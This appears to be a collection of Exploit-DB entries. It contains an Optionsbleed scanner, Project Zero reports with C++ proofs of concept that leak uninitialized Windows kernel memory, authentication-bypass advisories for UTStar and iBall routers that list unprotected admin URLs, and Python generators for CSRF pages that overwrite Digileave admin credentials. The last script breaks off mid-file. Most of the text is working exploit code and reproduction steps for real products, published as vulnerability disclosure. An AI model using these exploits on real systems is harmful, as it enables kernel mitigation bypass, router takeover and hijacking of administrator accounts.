https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42746.zip
#!/usr/bin/env python3
# Optionsbleed proof of concept test
# by Hanno Böck
import argparse
import urllib3
import re
def test_bleed(url, args):
r = pool.request('OPTIONS', url)
try:
allow = str(r.headers["Allow"])
except KeyError:
return False
if allow in dup:
return
dup.append(allow)
if allow == "":
print("[empty] %s" % (url))
elif re.match("^[a-zA-Z]+(-[a-zA-Z]+)? *(, *[a-zA-Z]+(-[a-zA-Z]+)? *)*$", allow):
z = [x.strip() for x in allow.split(',')]
if len(z) > len(set(z)):
print("[duplicates] %s: %s" % (url, repr(allow)))
elif args.all:
print("[ok] %s: %s" % (url, repr(allow)))
elif re.match("^[a-zA-Z]+(-[a-zA-Z]+)? *( +[a-zA-Z]+(-[a-zA-Z]+)? *)+$", allow):
print("[spaces] %s: %s" % (url, repr(allow)))
else:
print("[bleed] %s: %s" % (url, repr(allow)))
return True
parser = argparse.ArgumentParser(
description='Check for the Optionsbleed vulnerability (CVE-2017-9798).',
epilog="Tests server for Optionsbleed bug and other bugs in the allow header.\n\n"
"Autmatically checks http://, https://, http://www. and https://www. -\n"
"except if you pass -u/--url (which means by default we check 40 times.)\n\n"
"Explanation of results:\n"
"[bleed] corrupted header found, vulnerable\n"
"[empty] empty allow header, does not make sense\n"
"[spaces] space-separated method list (should be comma-separated)\n"
"[duplicates] duplicates in list (may be apache bug 61207)\n"
"[ok] normal list found (only shown with -a/--all)\n",
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('hosttocheck', action='store',
help='The hostname you want to test against')
parser.add_argument('-n', nargs=1, type=int, default=[10],
help='number of tests (default 10)')
parser.add_argument("-a", "--all", action="store_true",
help="show headers from hosts without problems")
parser.add_argument("-u", "--url", action='store_true',
help="pass URL instead of hostname")
args = parser.parse_args()
howoften = int(args.n[0])
dup = []
# Note: This disables warnings about the lack of certificate verification.
# Usually this is a bad idea, but for this tool we want to find vulnerabilities
# even if they are shipped with invalid certificates.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
pool = urllib3.PoolManager(10, cert_reqs='CERT_NONE')
if args.url:
test_bleed(args.hosttocheck, args)
else:
for prefix in ['http://', 'http://www.', 'https://', 'https://www.']:
for i in range(howoften):
try:
if test_bleed(prefix+args.hosttocheck, args) is False:
break
except Exception as e:
pass
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1273
We have encountered a number of Windows kernel crashes in the win32k.sys driver while processing corrupted TTF font files. The most frequent one occurring for the bug reported here is as follows:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8273777f, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 919c279f, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
FAULTING_IP:
win32k!bGeneratePath+60
919c279f 8b0f mov ecx,dword ptr [edi]
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
LAST_CONTROL_TRANSFER: from 91a9b6af to 919c279f
STACK_TEXT:
99ee4a14 91a9b6af 00000000 000003e0 00000010 win32k!bGeneratePath+0x60
99ee4a40 91a9a105 fbc62cf0 00000005 faebeda0 win32k!ttfdQueryTrueTypeOutline+0x79
99ee4a90 91a82fef 00000000 fbc62cf0 00000005 win32k!ttfdSemQueryTrueTypeOutline+0x45
99ee4ad8 91a65175 00000000 fbc62cf0 00000005 win32k!PDEVOBJ::QueryTrueTypeOutline+0x3e
99ee4b90 91a5cd60 fbc62cf0 fbc62cf0 00000003 win32k!GreGetGlyphOutlineInternal+0x4f5
99ee4c0c 8286c87a 2801007e 0000003b 00000003 win32k!NtGdiGetGlyphOutline+0x95
99ee4c0c 770570b4 2801007e 0000003b 00000003 nt!KiFastCallEntry+0x12a
WARNING: Frame IP not in any known module. Following frames may be wrong.
002df760 00000000 00000000 00000000 00000000 0x770570b4
---
We have observed the invalid memory addresses accessed by the win32k!bGeneratePath function to be seemingly "wild", e.g. 0x8273777f, 0xe9849de5, 0xc7617bc7, 0xf2edc7eb etc. The above crash dump comes from an old version of Windows 7 32-bit, because symbols for win32k.sys on the latest build are currently unavailable on the Microsoft Symbol Server. Nevertheless, a crash summary from an up-to-date system is as follows:
--- cut ---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8128f57d, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 925375f6, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
FAULTING_IP:
win32k!PATHOBJ_bCloseFigure+76
925375f6 8b0f mov ecx,dword ptr [edi]
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
LAST_CONTROL_TRANSFER: from 9261b9c8 to 925375f6
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
89277a10 9261b9c8 00000000 00000150 00000010 win32k!PATHOBJ_bCloseFigure+0x76
89277a3c 9261a316 fbb26cf0 0000000c fba36f38 win32k!XLATEOBJ_hGetColorTransform+0x423bf
89277a8c 926019b4 00000000 fbb26cf0 0000000c win32k!XLATEOBJ_hGetColorTransform+0x40d0d
89277ad4 925e33e5 00000000 fbb26cf0 0000000c win32k!XLATEOBJ_hGetColorTransform+0x283ab
89277b90 925dafcc fbb26cf0 fbb26cf0 00000003 win32k!XLATEOBJ_hGetColorTransform+0x9ddc
89277c0c 82837986 2201061c 00000029 00000003 win32k!XLATEOBJ_hGetColorTransform+0x19c3
89277c0c 772b6c74 2201061c 00000029 00000003 nt!KiSystemServicePostCall
0019f608 00000000 00000000 00000000 00000000 0x772b6c74
--- cut ---
While the above crashes are the most common ones, we have also encountered bugchecks (likely caused by the same issue) at the following other locations on old Windows 7 32-bit:
---
win32k!vQsplineToPolyBezier+43
91522614 8b4608 mov eax,dword ptr [esi+8]
---
win32k!vQsplineToPolyBezier+83
92292654 8941fc mov dword ptr [ecx-4],eax
---
... and on latest Windows 7 32-bit:
---
win32k!EngDeleteRgn+3293
91e0747c 8b460c mov eax,dword ptr [esi+0Ch]
---
The crash in win32k!vQsplineToPolyBezier+83 strongly suggests that the failures are caused or may lead to memory corruption, and consequently to arbitrary code execution.
While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "fpgm" table. In case of the few samples we have examined, the problem seems to stem from changing one of the instructions in the FPGM program to "FLIPPT".
The issue reproduces on Windows 7 (other platforms unchecked). It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it it also possible to observe a system crash on a default Windows installation. In order to reproduce the problem with the provided samples, it is necessary to use a custom program which calls the GetGlyphOutline() API with various parameters over all of the font's glyphs.
Attached is an archive with several proof-of-concept mutated TTF files.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42744.zip
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1268
We have discovered that the nt!NtGdiGetPhysicalMonitorDescription system call discloses portions of uninitialized kernel stack memory to user-mode clients, on Windows 7 to Windows 10.
This is caused by the fact that the syscall copies a whole stack-based array of 256 bytes (128 wide-chars) to the caller, but typically only a small portion of the buffer is used to store the requested monitor description, while the rest of it remains uninitialized. This memory region contains sensitive information such as addresses of executable images, kernel stack, kernel pools and stack cookies.
The attached proof-of-concept program demonstrates the disclosure by spraying the kernel stack with a large number of 0x41 ('A') marker bytes, and then calling the affected system call. An example output is as follows:
--- cut ---
00000000: 47 00 65 00 6e 00 65 00 72 00 69 00 63 00 20 00 G.e.n.e.r.i.c. .
00000010: 4e 00 6f 00 6e 00 2d 00 50 00 6e 00 50 00 20 00 N.o.n.-.P.n.P. .
00000020: 4d 00 6f 00 6e 00 69 00 74 00 6f 00 72 00 00 00 M.o.n.i.t.o.r...
00000030: 74 00 6f 00 72 00 2e 00 64 00 65 00 76 00 69 00 t.o.r...d.e.v.i.
00000040: 63 00 65 00 64 00 65 00 73 00 63 00 25 00 3b 00 c.e.d.e.s.c.%.;.
00000050: 47 00 65 00 6e 00 65 00 72 00 69 00 63 00 20 00 G.e.n.e.r.i.c. .
00000060: 4e 00 6f 00 6e 00 2d 00 50 00 6e 00 50 00 20 00 N.o.n.-.P.n.P. .
00000070: 4d 00 6f 00 6e 00 69 00 74 00 6f 00 72 00 00 00 M.o.n.i.t.o.r...
00000080: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000090: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000a0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000d0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000e0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000f0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
--- cut ---
If the stack spraying part of the PoC code is disabled, we can immediately observe various kernel-mode addresses in the dumped memory area.
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <PhysicalMonitorEnumerationAPI.h>
#include <cstdio>
extern "C"
NTSTATUS WINAPI NtMapUserPhysicalPages(
PVOID BaseAddress,
ULONG NumberOfPages,
PULONG PageFrameNumbers
);
NTSTATUS(WINAPI *GetPhysicalMonitorDescription)(
_In_ HANDLE hMonitor,
_In_ DWORD dwPhysicalMonitorDescriptionSizeInChars,
_Out_ LPWSTR szPhysicalMonitorDescription
);
#define PHYSICAL_MONITOR_DESCRIPTION_SIZE 128
#define STATUS_SUCCESS 0
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
VOID MyMemset(PVOID ptr, BYTE byte, ULONG size) {
PBYTE _ptr = (PBYTE)ptr;
for (ULONG i = 0; i < size; i++) {
_ptr[i] = byte;
}
}
VOID SprayKernelStack() {
// Buffer allocated in static program memory, hence doesn't touch the local stack.
static SIZE_T buffer[1024];
// Fill the buffer with 'A's and spray the kernel stack.
MyMemset(buffer, 'A', sizeof(buffer));
NtMapUserPhysicalPages(buffer, ARRAYSIZE(buffer), (PULONG)buffer);
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
MyMemset(buffer, 'B', sizeof(buffer));
}
int main() {
WCHAR OutputBuffer[PHYSICAL_MONITOR_DESCRIPTION_SIZE];
HMODULE hGdi32 = LoadLibrary(L"gdi32.dll");
GetPhysicalMonitorDescription = (NTSTATUS(WINAPI *)(HANDLE, DWORD, LPWSTR))GetProcAddress(hGdi32, "GetPhysicalMonitorDescription");
// Create a window for referencing a monitor.
HWND hwnd = CreateWindowW(L"BUTTON", L"TestWindow", WS_OVERLAPPEDWINDOW | WS_VISIBLE,
CW_USEDEFAULT, CW_USEDEFAULT, 100, 100, NULL, NULL, 0, 0);
/////////////////////////////////////////////////////////////////////////////
// Source: https://msdn.microsoft.com/en-us/library/windows/desktop/dd692950(v=vs.85).aspx
/////////////////////////////////////////////////////////////////////////////
HMONITOR hMonitor = NULL;
DWORD cPhysicalMonitors;
LPPHYSICAL_MONITOR pPhysicalMonitors = NULL;
// Get the monitor handle.
hMonitor = MonitorFromWindow(hwnd, MONITOR_DEFAULTTOPRIMARY);
// Get the number of physical monitors.
BOOL bSuccess = GetNumberOfPhysicalMonitorsFromHMONITOR(hMonitor, &cPhysicalMonitors);
if (bSuccess) {
// Allocate the array of PHYSICAL_MONITOR structures.
pPhysicalMonitors = (LPPHYSICAL_MONITOR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, cPhysicalMonitors * sizeof(PHYSICAL_MONITOR));
if (pPhysicalMonitors != NULL) {
// Get the array.
bSuccess = GetPhysicalMonitorsFromHMONITOR(hMonitor, cPhysicalMonitors, pPhysicalMonitors);
if (bSuccess) {
for (DWORD i = 0; i < cPhysicalMonitors; i++) {
RtlZeroMemory(OutputBuffer, sizeof(OutputBuffer));
SprayKernelStack();
NTSTATUS st = GetPhysicalMonitorDescription(pPhysicalMonitors[i].hPhysicalMonitor, PHYSICAL_MONITOR_DESCRIPTION_SIZE, OutputBuffer);
if (st == STATUS_SUCCESS) {
PrintHex((PBYTE)OutputBuffer, sizeof(OutputBuffer));
} else {
printf("[-] GetPhysicalMonitorDescription failed, %x\n", st);
}
}
// Close the monitor handles.
bSuccess = DestroyPhysicalMonitors(cPhysicalMonitors, pPhysicalMonitors);
}
// Free the array.
HeapFree(GetProcessHeap(), 0, pPhysicalMonitors);
}
}
DestroyWindow(hwnd);
return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1269
We have discovered that the nt!NtRemoveIoCompletion system call handler discloses 4 bytes of uninitialized pool memory to user-mode clients on 64-bit platforms.
The bug manifests itself while passing the IO_STATUS_BLOCK structure back to user-mode. The structure is defined as follows:
--- cut ---
typedef struct _IO_STATUS_BLOCK {
union {
NTSTATUS Status;
PVOID Pointer;
};
ULONG_PTR Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
--- cut ---
On 64-bit Windows builds, the "Pointer" field is 64 bits in width while the "Status" field is 32-bits wide. This means that if only "Status" is initialized, the upper 32 bits of "Pointer" remain garbage. This is what happens in the nt!NtSetIoCompletion syscall, which allocates a completion packet with a nested IO_STATUS_BLOCK structure (from the pools or a lookaside list), and only sets the .Status field to a user-controlled 32-bit value, leaving the remaining part of the union untouched.
Furthermore, the nt!NtRemoveIoCompletion system call doesn't rewrite the structure to only pass the relevant data back to user-mode, but copies it in its entirety, thus disclosing the uninitialized 32 bits of memory to the ring-3 client. The attached proof-of-concept program illustrates the problem by triggering the vulnerability in a loop, and printing out the leaked value. When run on Windows 7 x64, we're seeing various upper 32-bit portions of kernel-mode pointers:
--- cut ---
Leak: FFFFF80011111111
Leak: FFFFF80011111111
Leak: FFFFF80011111111
Leak: FFFFF80011111111
...
Leak: FFFFF88011111111
Leak: FFFFF88011111111
Leak: FFFFF88011111111
Leak: FFFFF88011111111
...
Leak: FFFFFA8011111111
Leak: FFFFFA8011111111
Leak: FFFFFA8011111111
Leak: FFFFFA8011111111
--- cut ---
We suspect that the monotony in the nature of the disclosed value is caused by the usage of a lookaside list, and it could likely be overcome by depleting the list and forcing the kernel to fall back on regular pool allocations. Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
The issue was discovered by James Forshaw of Google Project Zero.
*/
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <winternl.h>
#pragma comment(lib, "ntdll.lib")
extern "C" NTSTATUS __stdcall NtCreateIoCompletion(
PHANDLE IoCompletionHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
DWORD NumberOfConcurrentThreads
);
extern "C" NTSTATUS __stdcall NtRemoveIoCompletion(
HANDLE IoCompletionHandle,
PUINT_PTR KeyContext,
PUINT_PTR ApcContext,
PIO_STATUS_BLOCK IoStatusBlock,
PLARGE_INTEGER Timeout
);
extern "C" NTSTATUS __stdcall NtSetIoCompletion(
HANDLE IoCompletionHandle,
UINT_PTR KeyContext,
UINT_PTR ApcContext,
UINT_PTR Status,
UINT_PTR IoStatusInformation
);
int main()
{
HANDLE io_completion;
NTSTATUS status = NtCreateIoCompletion(&io_completion, MAXIMUM_ALLOWED, nullptr, 0);
if (!NT_SUCCESS(status))
{
printf("Error creation IO Completion: %08X\n", status);
return 1;
}
while (true)
{
status = NtSetIoCompletion(io_completion, 0x12345678, 0x9ABCDEF0, 0x11111111, 0x22222222);
if (!NT_SUCCESS(status))
{
printf("Error setting IO Completion: %08X\n", status);
return 1;
}
IO_STATUS_BLOCK io_status = {};
memset(&io_status, 'X', sizeof(io_status));
UINT_PTR key_ctx;
UINT_PTR apc_ctx;
status = NtRemoveIoCompletion(io_completion, &key_ctx, &apc_ctx, &io_status, nullptr);
if (!NT_SUCCESS(status))
{
printf("Error setting IO Completion: %08X\n", status);
return 1;
}
UINT_PTR p = (UINT_PTR)io_status.Pointer;
if ((p >> 32) != 0)
{
printf("Leak: %p\n", io_status.Pointer);
}
}
return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1267&desc=2
We have discovered that the win32k!NtGdiGetGlyphOutline system call handler may disclose large portions of uninitialized pool memory to user-mode clients.
The function first allocates memory (using win32k!AllocFreeTmpBuffer) with a user-controlled size, then fills it with the outline data via win32k!GreGetGlyphOutlineInternal, and lastly copies the entire buffer back into user-mode address space. If the amount of data written by win32k!GreGetGlyphOutlineInternal is smaller than the size of the allocated memory region, the remaining part will stay uninitialized and will be copied in this form to the ring-3 client.
The bug can be triggered through the official GetGlyphOutline() API, which is a simple wrapper around the affected system call. The information disclosure is particularly severe because it allows the attacker to leak an arbitrary number of bytes from an arbitrarily-sized allocation, potentially enabling them to "collide" with certain interesting objects in memory.
Please note that the win32k!AllocFreeTmpBuffer routine works by first attempting to return a static block of 4096 bytes (win32k!gpTmpGlobalFree) for optimization, and only when it is already busy, a regular pool allocation is made. As a result, the attached PoC program will dump the contents of that memory region in most instances. However, if we enable the Special Pools mechanism for win32k.sys and start the program in a loop, we will occasionally see output similar to the following (for 64 leaked bytes). The repeated 0x67 byte in this case is the random marker inserted by Special Pools.
--- cut ---
00000000: 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 gggggggggggggggg
00000010: 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 gggggggggggggggg
00000020: 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 gggggggggggggggg
00000030: 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 67 gggggggggggggggg
--- cut ---
Interestingly, the bug is only present on Windows 7 and 8. On Windows 10, the following memset() call was added:
--- cut ---
.text:0018DD88 loc_18DD88: ; CODE XREF: NtGdiGetGlyphOutline(x,x,x,x,x,x,x,x)+5D
.text:0018DD88 push ebx ; size_t
.text:0018DD89 push 0 ; int
.text:0018DD8B push esi ; void *
.text:0018DD8C call _memset
--- cut ---
The above code pads the overall memory area with zeros, thus preventing any kind of information disclosure. This suggests that the issue was identified internally by Microsoft but only fixed in Windows 10 and not backported to earlier versions of the system.
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <cstdio>
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
} else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
} else {
printf(".");
}
}
printf("\n");
}
}
int main(int argc, char **argv) {
if (argc < 2) {
printf("Usage: %s <number of bytes to leak>\n", argv[0]);
return 1;
}
UINT NumberOfLeakedBytes = strtoul(argv[1], NULL, 0);
// Create a Device Context.
HDC hdc = CreateCompatibleDC(NULL);
// Create a TrueType font.
HFONT hfont = CreateFont(1, // nHeight
1, // nWidth
0, // nEscapement
0, // nOrientation
FW_DONTCARE, // fnWeight
FALSE, // fdwItalic
FALSE, // fdwUnderline
FALSE, // fdwStrikeOut
ANSI_CHARSET, // fdwCharSet
OUT_DEFAULT_PRECIS, // fdwOutputPrecision
CLIP_DEFAULT_PRECIS, // fdwClipPrecision
DEFAULT_QUALITY, // fdwQuality
FF_DONTCARE, // fdwPitchAndFamily
L"Times New Roman");
// Select the font into the DC.
SelectObject(hdc, hfont);
// Get the glyph outline length.
GLYPHMETRICS gm;
MAT2 mat2 = { 0, 1, 0, 0, 0, 0, 0, 1 };
DWORD OutlineLength = GetGlyphOutline(hdc, 'A', GGO_BITMAP, &gm, 0, NULL, &mat2);
if (OutlineLength == GDI_ERROR) {
printf("[-] GetGlyphOutline#1 failed.\n");
DeleteObject(hfont);
DeleteDC(hdc);
return 1;
}
// Allocate memory for the outline + leaked data.
PBYTE OutputBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, OutlineLength + NumberOfLeakedBytes);
// Fill the buffer with uninitialized pool memory from the kernel.
OutlineLength = GetGlyphOutline(hdc, 'A', GGO_BITMAP, &gm, OutlineLength + NumberOfLeakedBytes, OutputBuffer, &mat2);
if (OutlineLength == GDI_ERROR) {
printf("[-] GetGlyphOutline#2 failed.\n");
HeapFree(GetProcessHeap(), 0, OutputBuffer);
DeleteObject(hfont);
DeleteDC(hdc);
return 1;
}
// Print the disclosed bytes on screen.
PrintHex(&OutputBuffer[OutlineLength], NumberOfLeakedBytes);
// Free resources.
HeapFree(GetProcessHeap(), 0, OutputBuffer);
DeleteObject(hfont);
DeleteDC(hdc);
return 0;
}
# Exploit Title: UTStar WA3002G4 ADSL Broadband Modem Authentication Bypass Vulnerability
# CVE: CVE-2017-14243
# Date: 15-09-2017
# Exploit Author: Gem George
# Author Contact: https://www.linkedin.com/in/gemgrge
# Vulnerable Product: UTStar WA3002G4 ADSL Broadband Modem
# Firmware version: WA3002G4-0021.01
# Vendor Homepage: http://www.utstar.com/
# Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass
Vulnerability Details
======================
The CGI version of the admin page of UTStar modem does not authenticate the user and hence any protected page in the modem can be directly accessed by replacing page extension with cgi. This could also allow anyone to perform operations such as reset modem, change passwords, backup configuration without any authentication. The modem also disclose passwords of each users (Admin, Support and User) in plain text behind the page source.
How to reproduce
===================
Suppose 192.168.1.1 is the device IP and one of the admin protected page in the modem is http://192.168.1.1/abcd.html, then the page can be directly accessed as as http://192.168.1.1/abcd.cgi
Example URLs:
* http://192.168.1.1/info.cgi – Status and details
* http://192.168.1.1/upload.cgi – Firmware Upgrade
* http://192.168.1.1/backupsettings.cgi – perform backup settings to PC
* http://192.168.1.1/pppoe.cgi – PPPoE settings
* http://192.168.1.1/resetrouter.cgi – Router reset
* http://192.168.1.1/password.cgi – password settings
POC
=========
* https://www.youtube.com/watch?v=-wh1Y_jXMGk
-----------------------Greetz----------------------
++++++++++++++++++ www.0seccon.com ++++++++++++++++++
Saran,Jithin,Dhani,Vignesh,Hemanth,Sudin,Vijith,Joel
# Exploit Title: iBall ADSL2+ Home Router Authentication Bypass Vulnerability
# CVE: CVE-2017-14244
# Date: 15-09-2017
# Exploit Author: Gem George
# Author Contact: https://www.linkedin.com/in/gemgrge
# Vulnerable Product: iBall ADSL2+ Home Router WRA150N https://www.iball.co.in/Product/ADSL2--Home-Router/746
# Firmware version: FW_iB-LR7011A_1.0.2
# Vendor Homepage: https://www.iball.co.in
# Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass
Vulnerability Details
======================
iBall ADSL2+ Home Router does not properly authenticate when pages are accessed through cgi version. This could potentially allow a remote attacker access sensitive information and perform actions such as reset router, downloading backup configuration, upload backup etc.
How to reproduce
===================
Suppose 192.168.1.1 is the router IP and one of the valid page in router is is http://192.168.1.1/abcd.html, then the page can be directly accessed as as http://192.168.1.1/abcd.cgi
Example URLs:
* http://192.168.1.1/info.cgi – Status and details
* http://192.168.1.1/upload.cgi – Firmware Upgrade
* http://192.168.1.1/backupsettings.cgi – perform backup settings to PC
* http://192.168.1.1/pppoe.cgi – PPPoE settings
* http://192.168.1.1/resetrouter.cgi – Router reset
* http://192.168.1.1/password.cgi – password settings
POC
=========
* https://www.youtube.com/watch?v=_SvrwCSdn54
-----------------------Greetz----------------------
++++++++++++++++++ www.0seccon.com ++++++++++++++++++
Saran,Jithin,Dhani,Vignesh,Hemanth,Sudin,Vijith,Joel
#!/usr/local/bin/python
# # # # #
# Exploit Title: Digileave 1.2 - Cross-Site Request Forgery (Update User & Admin)
# Dork: N/A
# Date: 18.09.2017
# Vendor Homepage: http://www.digiappz.com/
# Software Link: http://www.digiappz.com/digileave.asp?id=1
# Demo: http://www.digiappz.com/digileave/login.asp
# Version: 1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
import os
import urllib
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
def csrfexploit():
e_baslik = '''
################################################################################
______ _______ ___ _ __ _____ _______ ___________ _ __
/ _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / /
/ // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ /
_/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| /
/___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/
WWW.IHSAN.NET
ihsan[@]ihsan.net
+
Digileave 1.2 - CSRF (Update Admin)
################################################################################
'''
print e_baslik
url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://) \n Demo Site:http://digiappz.com/digileave: "))
id = raw_input(" [+] Enter The User ID \n (Demo Site Admin ID:8511): ")
csrfhtmlcode = '''
<html>
<body>
<form method="POST" action="%s/user_save.asp" name="user">
<table border="0" align="center">
<tbody><tr>
<td valign="middle">
<table border="0" align="center">
<tbody><tr>
<td bgcolor="gray" align="center">
<table width="400" cellspacing="1" cellpadding="2" border="0">
<tbody><tr>
<td colspan="2" bgcolor="cream" align="left">
<font color="red">User Update</font>
</td>
</tr>
<tr>
<td>
<font><b>Choose Login*</b></font>
</td>
<td>
<input name="login" size="30" value="admin" type="text">
</td>
</tr>
<tr>
<td>
<font><b>Choose Password*</b></font>
</td>
<td>
<input name="password" size="30" value="admin" type="text">
</td>
</tr>
<tr>
<td>
<font><b>First Name*</b></font>
</td>
<td>
<input name="first_name" size="30" value="admin" type="text">
</td>
</tr>
<tr>
<td>
<font><b>Last Name*</b></font>
</td>
<td>
<input name="last_name" size="30" value="admin" type="text">
</td>
</tr>
<tr>
<td>
<font><b>Email*</b></font>
</td>
<td>
<input name="email" size="30" value="admin@admin.com" onblur="emailvalid(this);" type="text">
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input name="id" value="%s" type="hidden">
<input value="Update" onclick="return check()" type="submit">
</td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
</form>
''' %(url, id)
print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."
print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
extension = ".html"
name = raw_input(" Filename: ")
filename = name+extension
file = open(filename, "w")
file.write(csrfhtmlcode)
file.close()
print(" [+] Your exploit is saved as %s")%filename
print("")
csrfexploit()
#!/usr/local/bin/python
# # # # #
# Exploit Title: DigiAffiliate 1.4 - Cross-Site Request Forgery (Update Admin)
# Dork: N/A
# Date: 18.09.2017
# Vendor Homepage: http://www.digiappz.com/
# Software Link: http://www.digiappz.com/digiaffiliate.asp?id=7
# Demo: http://www.digiappz.com/digiaffiliate/login.asp
# Version: 1.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
import os
import urllib
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
def csrfexploit():
e_baslik = '''
################################################################################
______ _______ ___ _ __ _____ _______ ___________ _ __
/ _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / /
/ // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ /
_/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| /
/___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/
WWW.IHSAN.NET
ihsan[@]ihsan.net
+
DigiAffiliate 1.4 - CSRF (Update Admin)
################################################################################
'''
print e_baslik
url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://) \n Demo Site:http://digiappz.com/digiaffiliate: "))
id = raw_input(" [+] Enter The User ID \n (Demo Site Admin ID:220): ")
csrfhtmlcode = '''
<html>
<body>
